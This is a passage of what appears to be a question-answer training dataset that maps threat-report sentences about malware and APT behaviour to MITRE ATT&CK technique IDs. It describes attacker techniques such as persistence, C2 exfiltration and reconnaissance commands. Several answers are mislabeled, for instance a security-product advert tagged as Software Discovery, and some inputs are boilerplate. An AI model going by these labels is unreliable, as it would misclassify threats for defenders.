framework.,Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot uploads files and secondary payloads to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can write files to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used Registry Run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner adds plist files with the naming format com.random_name.plist in the /Library/LaunchDaemons folder with the RunAtLoad and KeepAlive keys set to true.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used WinRAR to compress data prior to exfil.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) Appendix D — Domain name parking example CTU researchers have observed TG-3390 parking domains by pointing their A record to a non-routable IP space, including the 127.0.0.[x] loopback address### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group tools decrypted additional payloads from the C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can use CMD to execute a process.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses Perl scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has queried information on machines to determine the current user or system owner .### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has been executed via malicious links in e-mails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc lists files in directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can also download data from the C2 which is split into 81,920-byte portions.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Regin stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install an older version of the operating system of a network device to weaken security.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,I download my tools from GitHub, and so do my victims### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hard Disk Check The Trojan will perform the following WMI query:   Select * from Win32_DiskDrive   The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to remove such artifacts.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clicking on the shortcut ultimately leads to Backdoor.Pirpi being downloaded and executed on the affected computer### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has the capability to upload collected files to a C2.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 kills and disables services by using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* ExecReload directive covers when a service restarts.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use large file sizes to evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment or sandbox.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command to transfer files from a remote host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Lazarus Group malware sample adds persistence on the system by creating a shortcut in the user’s Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse a double extension in the filename as a means of masquerading the true file type.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can obtain running services on the victim.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre can detect sandbox analysis environments by inspecting the process list and Registry.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has embedded links to malicious downloads in e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The displacement of the injected code does introduce the additional requirement for functionality to remap memory references.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has been packed with Enigma Protector to obfuscate its contents.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Turla JavaScript backdoor has used Google Apps Script as its C2 server.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 modified timestamps of backdoors to match legitimate Windows files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak logs key strokes for configured processes and sends them back to the C2 server.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GCMAN uses Putty for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to determine local time on a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use these scripts to maintain persistence on a network.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password managers are applications designed to store user credentials, normally in an encrypted database.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious forms will execute when an adversary sends a specifically crafted email to the user.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Ke3chang group has been known to compress data before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,as thousands of similar API functions exist for various system operations.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may create a new instance or virtual machine within the compute service of a cloud account to evade defenses.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The same code snippets are combined into a second stage JavaScript in “C:\Users\\”### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has stored its malicious payload in the registry key HKLM\SOFTWARE\Microsoft\DRM.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin can save a new file to the system from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to identify the user on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,exploits a known Windows privilege escalation vulnerability ( ) on unpatched computers.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can use DLL hijacking to bypass security controls.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the language is found in the list, the process terminates.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has the ability to collect the domain name on a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses ps aux with the grep command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has created a service on victim machines named ""TaskFrame"" to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has collected and staged credentials and network enumeration information, using the networkdll and psfin TrickBot modules.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has signed files with the name EGIS CO,.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may use net group ""domain admins"" /domain to display accounts in the ""domain admins"" permissions group and net localgroup ""administrators"" to list local system administrator group membership.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses a batch file to load a DLL into the svchost.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage these mechanisms to execute malicious content.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK provides access to the Windows Registry, which can be used to gather information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper will attempt to enumerate Windows version and system architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious code as signed by: * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has the capability to to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 5 Remote template document requesting the user to click “Enable Content” to run macro Clustering The delivery documents used in the October and November waves shared a large number of similarities, as seen in Table 1, which allowed us to cluster the activity together### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Queued APC functions are executed when the thread enters an alterable state.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 added their own devices as allowed IDs for active sync using Set-CASMailbox, allowing it to obtain copies of victim mailboxes.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can monitor processes for open browsers and custom banking applications.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has exfiltrated victim information using FTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For efficiency, many protocols use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses RC4 encryption over TCP to communicate with its C2 server.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal took screenshots using their Windows malware.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis encodes the data sent to the server in Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actors also deleted specific Registry keys.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can add the following registry entry: HKEY_CURRENT_USER\SOFTWARE\{8 random characters}.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects information about the Internet adapter configuration.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A new registry entry is created at HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics with a value of “C:\ ProgramData \ Initech \Initech.exe” /run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy is capable of taking screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WEBC2 can download and execute a file.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used Windows command scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can obtain the victim IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY can delete volume shadow copies on compromised hosts.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has the ability to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MAGIC HOUND TOOLSET The Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and Microsoft Office documents, specifically Excel and Word documents containing malicious macros### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware uses WMI to script data collection and command execution on the victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Resource forks have been deprecated and replaced with the application bundle structure.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL has been installed as a Windows service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can gather the disk volume information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can decode and decrypt messages received from C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth encodes data using Base64 before sending it to the C2 server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inveigh ### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the “attachedTemplate” technique to load a template from a remote server### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used a function to gather the current time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored in by PowerShell### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can collect the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used the command query user on victim hosts.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In these websites they hosted malware that was digitally signed with a valid, likely stolen code signing certificate Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use stolen password hashes to ""overpass the hash.""### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL collects the computer name and host name on the compromised system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Interactive command shells may be in use, and common functionality within cmd may be used to gather information.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Two of them are MacOS X User-Agents and the third is a hashed string: Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405 E9BC3BD76216AFA560BFB5ACAF5731A3 Figure 5: SpeakUp `s requests are encrypted with the salted base64 and include the unique User-Agent At the moment SpeakUp serves XMRig miners to its listening infected servers### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The APT1 group is known to have used RDP during operations.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda collects the current system time and sends it back to the C2 server.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell has the ability to modify file permissions.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has the ability to download and execute additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya performed port scanning to obtain the list of active services.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYSCON has been executed by luring victims to open malicious e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has the capability to gather the OS version and computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal's DLL file and non-malicious decoy file are encrypted with RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince lists the running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format..### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While invoking API functions, adversaries may also attempt to bypass defensive tools .### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex contains a module for VNC.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tools may be placed on infrastructure that was previously purchased/rented by the adversary or was otherwise compromised by them .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise executes net user after initial communication is made to the remote server.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used the NtdsAudit utility to collect information related to accounts and passwords.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise accounts with services that can be used during targeting.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear has the ability to decrypt its RC4 encrypted payload for execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can download malicious files from threat actor controlled AWS URL's.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has registered fraudulent domains such as ""mail-newyorker.com"" and ""news12.com.recover-session-service.site"" to target specific victims with phishing attacks.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used ZwQueueApcThread to inject itself into remote processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect the local time on a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBShower has the ability to download VBS files to 